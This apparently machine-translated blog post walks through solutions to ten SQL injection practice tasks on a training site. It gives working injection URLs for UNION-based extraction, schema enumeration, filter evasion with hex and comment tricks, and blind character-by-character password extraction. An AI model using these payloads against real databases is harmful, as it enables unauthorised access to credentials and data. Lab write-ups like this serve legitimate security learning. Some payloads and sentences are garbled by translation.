Solving sql injection tasks from alexbers.com/sql

I want to share with Habrahabr an example of my solutions to sql injection tasks from the alexbers website.

Example 1: www.alexbers.com/sql/1.php

This is not even an example. It is required to write a query yourself with tables known in advance by all, a username.

Given: 
Table: users
Fields: id, login, pass 

Decision:

select * from users where id = '12 '

and the link will look like this:

https://www.alexbers.com/sql/1.php?text=select+*+from+users+where+id%3D%2712%27

Just a request with all the data that we know about.

Example 2: www.alexbers.com/sql/qnbutn2.php

We have been shown a request:

select * from users where id = 2 or login = '$ text' 

Given:

Table: users
Fields: id, login, pass 
Requirement: Hooray, I know the answer (user password with id = 9):

This example shows a primitive vulnerability: input is not filtered in any way. Therefore, we can use the quotation mark:

https://www.alexbers.com/sql/qnbutn2.php?text=-1 'or id =' 9

What have we done? We brought the request to this form:

select * from users where id = 2 or login = '- 1' or id = '9'

We are trying to extract a user with id=2or with login=1or with from the users table id=9, which is taken with a quote on the left and will be closed with the quote of the original request. Since the user -1does not exist, we do not get anything from this request, but it id=9does exist. As a result, we get output from 2 lines - user s id=2and s id=9.

Example 3: www.alexbers.com/sql/sdjjy3.php

Again the request is visible:

select * from users where id = 2 or login = '$ text' limit 1 

Given:

Table: users
Fields: id, login, pass 
Requirement: Hooray, I know the answer (user password with id = 13):

The difference with the previous example is the restriction on output in 1 line. He goes away dancing when setting a comment that will “remove” the end of the line, ie It will not be processed.

Decision:

https://www.alexbers.com/sql/sdjjy3.php?text=-1 'or id = 13 - 123

Type of request:

select * from users where id = 2 or login = '- 1' or id = 13 - 123 'limit 1 

Thus, we throw out the restriction and extract the user with id = 13.

Example 4: www.alexbers.com/sql/qjqhweh4.php

Inquiry:

select * from users where id = 2 or login = '$ text' limit 1 

Given:

Tables: users, secret
Fields: id, login, pass - this is in users. Secret table - 3 fields
Requirement: Hooray, I know the answer (given to the secret table with the ggg = abc field):

A bit more interesting. Now we have 2 tables and the query is not executed to the table that we need. We will use the classic way. In mysql there is an operator that allows you to query different tables through 1 query. To work with query aggregation, we need the same number of fields in all query aggregations. We use the operator UNION. For the task, you need to find the given secret table with the field ggg=abc. The number of fields in the columns is the same, because the request will take the form:

Request:

https://www.alexbers.com/sql/qjqhweh4.php?text=-1'+union+select+* from secret where ggg = 'abc' + - + 123

One of the results will be the answer to the level.

Example 5: www.alexbers.com/sql/sdfkjsdk5.php

Inquiry:

select * from users where id = 2 or login = '$ text' limit 1

Given:

Tables: users, secret
Fields: id, login, pass - this is in users. Secret table - 2 fields
Requirement: Hooray, I know the answer (given by the secret table):

Let's try to repeat the previous example. We will find out how many columns are in the table users, we will extract a list of all columns for the secret table. At the moment, we do not have the same number of columns, so union must be used differently.

https://www.alexbers.com/sql/sdfkjsdk5.php
? text = 1 'union + select + 1, concat_ws (0x3a, table_name, column_name), 3 + from + information_schema.columns where table_name =' secret '- + 123

We see that in our table secret - there are 2 columns, we will extract their values:

https://www.alexbers.com/sql/sdfkjsdk5.php?text=-1 'union select 1, dfgdfgfdg, dfgfddfgdfdfdf from secret-- 123

We see the answer.

Example 6: www.alexbers.com/sql/skldj6

Inquiry:

select * from users where id = $ text limit 1 

Given:

Tables: users
Fields: id, login, pass - this is in users. 
Quotation marks are filtered, only 1 row is output from the database
Requirement: Hurray, I know the answer (user password with the nickname god):

Here you can see the misunderstanding of the principles of the filter mysq_real_escape_stringwhen the value of the id variable is not placed in quotation marks. Then, although they are filtered 50 times, we do not need them, for text fields it will be possible to use a function CHAR()or translate it to hex.

https://www.alexbers.com/sql/skldj6.php?text=-1 union select id, login, pass from users where login = 0x676f64

Example 7: www.alexbers.com/sql/dsfhsdjkf7.php

Given:

Tables: users
Fields: id, login, pass - this is in users. Now only the first line of the answer is always displayed (the rest are not displayed)
The characters', ", +, =, comma, space, brackets are filtered
Requirement: Hooray, I know the answer (user password, with a nickname containing gentoo):

Inquiry:

select * from users where id = $ text limit 1 

Since the selection goes immediately to the table we need, you don’t even have to use the second query. Spaces are replaced with comments /**/ и /*!*/, there is only one problem - the equal sign is filtered. But it can be bypassed using the operator like. Comparing to a string involves quotation marks, so we encode it in hex. Also, we are not known for certain the nickname we are looking for, so we will use the mask search with the %login icon. The resulting attack vector will take the form:

https://www.alexbers.com/sql/dsfhsdjkf7.php?text=-1/*!or/*!login*/like/**/0x2567656e746f6f25

Example 8: www.alexbers.com/sql/qqqwwweeerrr8.php

Inquiry:

select * from users where id = $ text

Given:

Tables: users
Fields: id, login, pass - this is in users.
Hint: error messages will not be displayed 
Requirement: Hooray, I know the answer (user password, with the nickname fast)

The only thing that something is generally displayed to us is information that some kind of error has occurred, or the number of records displayed. The number of records displayed is the only number we can control. We are required to obtain a password from the user. A password is some information written in alphanumeric form. All we can operate with is numbers. So the password must be presented in numerical form. If you take and translate each character in ascii – form, then any character from the password will be in the form of a number. We will use the function to separate the character mid(), for ascii - the function ascii(), the attack vector will turn out like this:

https://www.alexbers.com/sql/qqqwwweeerrr8.php
? text = -1 or id <= (select ascii (mid (pass, 1,1)) from users where login = 'fast')

The output will give us an ascii representation of the first character of the password. Then we make a request for the second, etc.

Example 9: www.alexbers.com/sql/almost9.php

Tables: users
Fields: id, login, pass - this is in users.
Request: select * from users where id = $ text
Required: "Hooray, I know the answer (the numerical sum of user logins with 20 <= id <= 30)."

That is, we need to pull out the numerical value of each login and add it. In this case, we will operate with the following comparison:

The attack vector is divided into 2 queries:

https://www.alexbers.com/sql/almost9.php
? text = -1 or id <= cast ((select sum (login) from users where id between 20 and 30) as signed INTEGER) / 10
https://www.alexbers.com/sql/almost9.php
? text = -1 or id <= MOD (cast ((select sum (login) from users where id between 20 and 30) as signed INTEGER), 10)

There are 1069 entries in the table, so we won’t be able to display the answer in one

example 10

The solution to the 10th task is already described on YouTube, you can see it here: www.youtube.com/watch?v=dLSxTGvwcLw